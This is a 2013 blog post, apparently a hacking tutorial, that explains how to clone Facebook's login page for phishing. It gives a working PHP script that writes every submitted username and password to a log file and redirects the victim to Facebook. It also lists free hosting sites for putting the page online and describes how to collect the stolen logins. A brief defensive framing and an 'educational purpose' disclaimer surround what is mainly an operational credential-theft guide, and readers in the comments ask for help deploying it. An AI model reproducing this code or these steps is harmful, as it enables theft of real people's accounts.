Monday, July 29, 2013

Phishing Attack - What? How to Make ? How It Works?

Phishing ?
========
Phishing is the process of stealing sensitive information, such as usernames, passwords, and bank information, 
by pretending to be someone you’re not. An example of this would be if you receive and e-mail from a hacker 
pretending to be your bank. In this e-mail, it might tell you that you need to update your account before it expires, 
and then the hacker provides a link. Once you click on the link, you arrive at a website that looks exactly like 
your actual bank page. In reality it’s just a perfect replica, and when you input your login details, it sends it to 
the hackers email or stores it on his web server. Hackers that create the best, most deceiving phishing web 
pages are knowledgeable in the area of HTML and the PHP programming. Below I will show a simple example 
of some of the steps a hacker might take to create a phishing website. By seeing the steps a hacker would take,
 will help you defend against such an attack.


How To Make A Phishing Page Of Any Website ?
=====================================

Now  A Days The Major Companies Like Facebook, Google , Yahoo, Pinterest, etc.

All are in the competition but everyday 1000 of Account's are hack.

Steps Of Create Phish Page:

1. Go to the site which u want to make a phish page...




2. I will choose the "FACEBOOK"

3. After the site is open you can click ur mouse right click and choose the "view page source" option.





4. Copy the all code to notepad..



Now the actual hacking is begin..

5. After complete the copy u need to find login_form like this...

    In there u need to change the link to ur .php file.

    This is action of login and sending the data to server we can change it  with simple 
   
    "mail.php"  .  So all the data gone to our server where we hosted our phish files.

   

6.  Php script For any phishing page.

###########
##   Code:  ##
###########

<?php
header ('Location: https://www.facebook.com/pages/create/ ');
$handle = fopen("log.txt", "a");
foreach($_POST as $variable => $value) {
   fwrite($handle, $variable);
   fwrite($handle, "=");
   fwrite($handle, $value);
   fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;

?>

Copy this code and save in  "mail.php"  format.


7. Create a simple blank txt file and give them name " log.txt " .



And Done. Your phishing site is ready.




How to Use This Phishing Pages For Hacking Purpose ?
===========================================

1.    The first need to do Phishing Attack U need a Free Hosting sites. I provide u Many as 
        
       Follow :

       
Hosting Website That I Recommend:   http://000webhost.com/
      
Other Hosting Websites That You May Like:

* 110mb -                              http://110mb.com
* Ripway -                             http://ripway.com
* SuperFreeHost -               http://superfreehost.info
* Freehostia -                       http://freehostia.com
* Funpic -                              http://funpic.de 
* Funpic -                              http://funpic.org 
* Freeweb7 -                        http://freeweb7.com
* t35 -                                    http://t35.com
* Awardspace -                    http://awardspace.com
* PHPNet -                            http://phpnet.us
* Free Web Hosting Pro -   http://freewebhostingpro.com
* ProHosts -                          http://prohosts.org
* AtSpace -                           http://atspace.com
* 000webhost -                    http://000webhost.com/
* My5GB -                            http://www.my5gb.com/
* Oxyhost -                           http://www.oxyhost.com/
* Rack111 -                         http://www.rack111.com/
* Ocostwebhost -                http://0costwebhost.com/
* FreeZoka -                        http://www.freezoka.com/






2. After completed the Register u have a user name and pass to login.





3. Upload the phishing files to the server.





4. Now Test That it's working or not.

5. Open Your Domain which will you see in ur hosting site panel.



6. U see the phish page which u had uploaded open it...




7. After the page Loded u can put Your ID & PASSWORD ( i wrote this detail to the phish page)





    When u click on the login button it's sends the logs to our server.

8. Check this Log file & edit it & You see the logins with password.




Hope You Guys Enjoyed The Phishing Attack,,

If You Like It So plz... Comment....

NOTE :  This is Only For Educational Purpose.



2 comments:

Anonymous said...

i want to ask u how phish page tab is open in facebook page i done all step but this bar is not appear..can u plz tell me

Anonymous said...

i try to sign up but it is telling me: Please enter only full domain or subdomain and not both

Post a Comment